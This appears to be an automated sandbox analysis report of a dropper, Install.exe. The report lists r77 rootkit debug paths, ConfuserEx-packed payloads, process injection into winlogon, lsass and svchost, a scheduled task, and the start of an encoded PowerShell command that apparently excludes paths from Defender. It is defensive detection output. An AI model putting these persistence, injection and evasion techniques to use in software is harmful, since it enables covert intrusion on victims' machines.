Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\Install.pdb source: 34432.exe, 00000004.00000002.371180159.000000001702D000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.361388892.0000000013A39000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356979000.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.360948518.0000000013998000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000003.333426645.000000001C445000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, nslookup.exe, 00000016.00000000.330232590.0000000140000000.00000040.00000400.00020000.00000000.sdmp, nslookup.exe, 00000016.00000000.329876550.0000000140000000.00000040.00000400.00020000.00000000.sdmp, nslookup.exe, 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\Release\r77-x86.pdb source: powershell.exe, 00000019.00000002.430828592.000002C880212000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\InstallService64.pdb source: powershell.exe, 00000019.00000002.430828592.000002C880212000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.463366324.000002C8902E9000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe
Source: Binary string: x64.pdb source: svchost.exe
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\Release\InstallService32.pdb source: powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\InstallStager\obj\x64\Release\InstallStager.pdb source: 34432.exe, 00000004.00000002.361388892.0000000013A39000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.360948518.0000000013998000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356818562.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356782565.0000000003991000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000003.333426645.000000001C445000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.468321947.000002C8EBC93000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: N\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe
Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: ChiefKeefofficialnaxyi_crypted(6).exe, 00000002.00000002.225232923.0000000000113000.00000004.00000010.00020000.00000000.sdmp, ChiefKeefofficialnaxyi_crypted(6).exe, 00000002.00000003.224694291.0000000002672000.00000040.00001000.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.505647974.0000000000402000.00000020.00000400.00020000.00000000.sdmp
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe
Source: Binary string: RYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe
Source: C:\Users\user\Desktop\Install.exe | Code function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405C49
Source: C:\Users\user\Desktop\Install.exe | Code function: 1_2_00406873 FindFirstFileW,FindClose,1_2_00406873
Source: C:\Users\user\Desktop\Install.exe | Code function: 1_2_0040290B FindFirstFileW,1_2_0040290B
Source: C:\Windows\System32\nslookup.exe | Code function: 22_2_0000000140006E1C FindFirstFileExW,22_2_0000000140006E1C
Source: C:\Windows\System32\dllhost.exe | Code function: 39_2_00000001400073C8 FindFirstFileExW,39_2_00000001400073C8
Source: C:\Windows\System32\winlogon.exe | Code function: 42_2_000001AFDDD0D0E4 FindFirstFileExW,42_2_000001AFDDD0D0E4
Source: C:\Windows\System32\lsass.exe | Code function: 44_2_00000240B2BBD0E4 FindFirstFileExW,44_2_00000240B2BBD0E4
Source: C:\Windows\System32\svchost.exe | Code function: 47_2_000001CAF3D0D0E4 FindFirstFileExW,47_2_000001CAF3D0D0E4
Source: C:\Windows\System32\svchost.exe | Code function: 49_2_000001B8BFF4D0E4 FindFirstFileExW,49_2_000001B8BFF4D0E4

Networking

Source: C:\Users\user\AppData\Roaming\34432.exe | Process created: C:\Windows\System32\nslookup.exe C:\Windows\System32\nslookup.exe
Source: C:\Users\user\AppData\Roaming\34432.exe | Process created: C:\Windows\System32\nslookup.exe C:\Windows\System32\nslookup.exe
Source: powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmp | String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData
Source: powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmp | String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Obsolete
Source: powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmp | String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery
Source: powershell.exe, 00000026.00000002.485582465.00000283A0A44000.00000004.00000800.00020000.00000000.sdmp | String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData0I
Source: powershell.exe, 00000026.00000002.485582465.00000283A0A44000.00000004.00000800.00020000.00000000.sdmp | String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQueryux
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: powershell.exe, 00000008.00000002.303519748.000001FF69E80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.467492973.000002C8EBA50000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000026.00000003.472356728.00000283B87D2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mp
Source: powershell.exe, 00000026.00000003.472356728.00000283B87D2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mpowershell-EncodedCommandQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHM
Source: AppLaunch.exe, 00000005.00000002.512763531.0000000006D47000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com
Source: AppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: AppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com4Uk
Source: Install.exe, 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Install.exe, 00000001.00000000.217633196.000000000040A000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000008.00000002.301149982.000001FF61EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000019.00000002.435620250.000002C8806DF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.485582465.00000283A0A44000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 34432.exe, 00000004.00000002.356979000.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.288800846.000001FF51E81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.430121118.000002C880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.477975029.00000283A06B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.485582465.00000283A0A44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000019.00000002.435620250.000002C8806DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: AppLaunch.exe, 00000005.00000002.505647974.0000000000402000.00000020.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.codeplex.com/DotNetZip
Source: powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000019.00000002.435620250.000002C8806DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.298759051.000001FF53502000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.299698983.000001FF5367C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.300217713.000001FF53864000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.493191066.00000283A1A2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000003.422394060.00000283A2335000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000003.423315665.00000283A242E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000008.00000002.301149982.000001FF61EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: unknownDNS traffic detected: queries for: ip-api.com
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard

System Summary

Source: unknownProcess created: Commandline size = 2585
Source: unknownProcess created: Commandline size = 2578
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_0040755C
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_00406D85
Source: C:\Users\user\AppData\Roaming\34432.exeCode function: 4_2_00007FFF7E401C9B
Source: C:\Users\user\AppData\Roaming\34432.exeCode function: 4_2_00007FFF7E405C20
Source: C:\Users\user\AppData\Roaming\34432.exeCode function: 4_2_00007FFF7E401CCC
Source: C:\Users\user\AppData\Roaming\34432.exeCode function: 4_2_00007FFF7E401D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_0532148E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05327D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05321DC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_0532DF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_0532BFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_0532C870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05320868
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05320B48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05321587
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_053220F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_0532BC58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05321E71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05320B39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05320B82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05327A38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_09417560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_09417570
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFF7E3F1958
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFF7E3F19B8
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_0000000140001000
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_00000001400011D0
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_0000000140006C10
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_0000000140005098
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_0000000140006E1C
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_000000014000AABC
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_000000014000CAD8
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 30_2_00007FFF7E3F4640
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 30_2_00007FFF7E3F1C9B
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 30_2_00007FFF7E3F1CCC
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 30_2_00007FFF7E3F1D60
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 33_2_00007FFF7E401C9B
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 33_2_00007FFF7E401CCC
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 33_2_00007FFF7E401D60
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_0000000140001000
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_0000000140001420
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_0000000140001430
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_000000014000558C
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_00000001400071BC
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_000000014000B2CC
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_000000014000D2E8
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_00000001400073C8
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDCDC4E4
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDCE2418
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDCD0800
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDCE0400
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDCDC2D8
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDCD1660
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD01400
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD0D0E4
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD13018
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD11000
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD0CED8
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD02260
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2B8C4E4
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2B8C2D8
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2B81660
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2B92418
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2B80800
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2B90400
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BBD0E4
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BBCED8
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BB2260
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BC3018
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BB1400
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BC1000
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3CE2418
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3CE0400
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3CD0800
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3CDC2D8
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3CD1660
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3CDC4E4
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D01400
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D02260
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D0D0E4
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D13018
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D11000
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D0CED8
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF11660
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF1C4E4
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF22418
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF10800
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF20400
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF1C2D8
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF41400
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF42260
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF4D0E4
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF53018
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF51000
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF4CED8
Source: Install.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Install.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: 33.2.chrome.exe.fa0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 30.0.chrome.exe.20000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 30.2.chrome.exe.20000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 4.0.34432.exe.770000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 4.2.34432.exe.770000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 33.0.chrome.exe.fa0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: C:\Users\user\AppData\Roaming\34432.exe, type: DROPPEDMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe, type: DROPPEDMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_oz5sx3tu.kvs.ps1
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Windows\System32\nslookup.exeFile created: C:\Windows\Tasks\nslooksvc32.job
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_0000000140001420 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,LocalFree,CloseHandle,FindCloseChangeNotification,VirtualAllocEx,WriteProcessMemory,GetModuleHandleA,GetProcAddress,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,FindCloseChangeNotification,CloseHandle
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_0000000140001430 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,FindCloseChangeNotification,VirtualAllocEx,WriteProcessMemory,GetModuleHandleA,GetProcAddress,NtCreateThreadEx,CloseHandle,FindCloseChangeNotification,CloseHandle
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD03120 NtEnumerateValueKey,NtEnumerateValueKey
Source: chrome.exe.4.drStatic PE information: No import functions for PE file found
Source: 34432.exe.1.drStatic PE information: No import functions for PE file found
Source: Install.exe, 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename34432.exe< vs Install.exe
Source: Install.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Install.exeFile created: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe
Source: classification engineClassification label: mal100.troj.evad.winEXE@44/26@1/1
Source: C:\Users\user\Desktop\Install.exeFile read: C:\Users\desktop.ini
Source: chrome.exe.4.dr, u200f????????????????????????????????????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: chrome.exe.4.dr, u200f????????????????????????????????????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 34432.exe.1.dr, u200f????????????????????????????????????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 34432.exe.1.dr, u200f????????????????????????????????????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_0000000140001000 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW,RegOpenKeyExW,RegSetValueExW
Source: Install.exeVirustotal: Detection: 41%
Source: Install.exeReversingLabs: Detection: 73%
Source: C:\Users\user\Desktop\Install.exeFile read: C:\Users\user\Desktop\Install.exe
Source: C:\Users\user\Desktop\Install.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Users\user\Desktop\Install.exe "C:\Users\user\Desktop\Install.exe"
Source: C:\Users\user\Desktop\Install.exeProcess created: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Install.exeProcess created: C:\Users\user\AppData\Roaming\34432.exe C:\Users\user\AppData\Roaming\34432.exe
